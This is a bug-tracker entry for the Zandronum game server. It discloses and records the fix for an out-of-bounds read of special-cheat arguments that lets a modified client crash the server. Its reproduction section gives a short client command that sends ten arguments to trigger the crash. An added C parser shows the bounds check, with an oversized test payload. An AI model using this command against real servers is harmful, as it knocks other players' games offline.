ID: 0002694
Project: Zandronum
Category: [All Projects] Bug
View Status: public
Date Submitted: 2016-04-02 22:11
Last Update: 2018-09-30 22:33
Reporter: Dusk
Assigned To: Dusk
Priority: normal
Severity: exploit
Reproducibility: always
Status: closed
Resolution: fixed
Platform:
OS:
OS Version:
Product Version: 3.0-beta
Target Version: 3.0
Fixed in Version:
Summary: 0002694: Modified client can crash the server using the special cheat
Description: The server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled.
Steps To Reproduce:

#include "c_dispatch.h"
CCMD (crashserver)
{
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );

    for ( unsigned int i = 0; i < 10; ++i )
        NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
Attached Files: 2694-fix.diff (621 bytes) 2016-04-02 22:41

- Relationships
child of 0002620 (closed, Dusk): the 'special' cheat does not work online
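The bounds check the description calls for, as an added example that is not Zandronum's code and not the attached 2694-fix.diff: a stand-alone C parser for a payload shaped like the one the reproduction command sends (special byte, argument-count byte, then that many 32-bit values). The struct, the function names, the little-endian byte order and the choice to reject rather than clamp an oversized count are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SPECIAL_ARGS 5 /* fixed array size named in the report */

typedef struct { /* hypothetical parsed message, not a Zandronum type */
    uint8_t special, argc;
    int32_t args[MAX_SPECIAL_ARGS];
} special_cheat_t;
typedef enum { PARSE_OK, PARSE_TRUNCATED, PARSE_TOO_MANY_ARGS } parse_result_t;

/* Constructed payloads (bytes after the command byte): special, argc, longs. */
#define ARG123 123, 0, 0, 0
static const uint8_t OVERSIZED[] = { 123, 10, ARG123, ARG123, ARG123, ARG123, ARG123,
                                     ARG123, ARG123, ARG123, ARG123, ARG123 };
static const uint8_t VALID[] = { 123, 2, 7, 0, 0, 0, 0, 1, 0, 0 };

static int32_t read_le32(const uint8_t *p) /* byte order is an assumption */
{
    return (int32_t)((uint32_t)p[0] | (uint32_t)p[1] << 8 |
                     (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24);
}

parse_result_t parse_special_cheat(const uint8_t *buf, size_t len, special_cheat_t *out)
{
    if (len < 2)
        return PARSE_TRUNCATED;
    uint8_t argc = buf[1];
    /* An unchecked `for (i = 0; i < argc; i++) args[i] = ...` writes past
       args[4] when the peer sends argc > 5; bound the count first. */
    if (argc > MAX_SPECIAL_ARGS)
        return PARSE_TOO_MANY_ARGS;
    if (len - 2 < (size_t)argc * 4) /* packet must really hold argc longs */
        return PARSE_TRUNCATED;
    memset(out, 0, sizeof *out);
    out->special = buf[0];
    out->argc = argc;
    for (size_t i = 0; i < argc; i++)
        out->args[i] = read_le32(buf + 2 + i * 4);
    return PARSE_OK;
}

int main(void)
{
    special_cheat_t m;
    printf("oversized -> %d\n", (int)parse_special_cheat(OVERSIZED, sizeof OVERSIZED, &m));
    return 0;
}
```

Rejecting the whole message keeps the stream in sync; a parser that clamps the count instead still has to consume the extra values before reading the next command.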

-  Notes
(0014647)
Dusk (developer)
2016-04-02 22:39

I've fixed this, but won't push till Monday since there's a testing event coming tomorrow. Diff attached.
(0014843)
Edward-san (developer)
2016-05-08 21:00

Added with changeset: 'https://bitbucket.org/Torr_Samaho/zandronum/commits/b63775a6dd289626e3ac75aee8f6e68f0dd793a8'.


- Issue History
Date Modified Username Field Change
2016-04-02 22:11 Dusk New Issue
2016-04-02 22:12 Dusk Summary Client can crash the server using the special cheat => Modified client can crash the server using the special cheat
2016-04-02 22:19 Dusk Relationship added child of 0002620
2016-04-02 22:39 Dusk Note Added: 0014647
2016-04-02 22:40 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk File Deleted: 2694-fix.diff
2016-04-02 22:41 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk Assigned To => Dusk
2016-04-02 22:41 Dusk Status new => needs review
2016-05-08 21:00 Edward-san Note Added: 0014843
2016-05-08 21:00 Edward-san Status needs review => needs testing
2016-12-24 22:43 Dusk Target Version => 3.0
2017-02-17 10:09 Dusk Status needs testing => resolved
2017-02-17 10:09 Dusk Resolution open => fixed
2017-02-17 10:09 Dusk View Status private => public
2018-09-30 22:33 Blzut3 Status resolved => closed
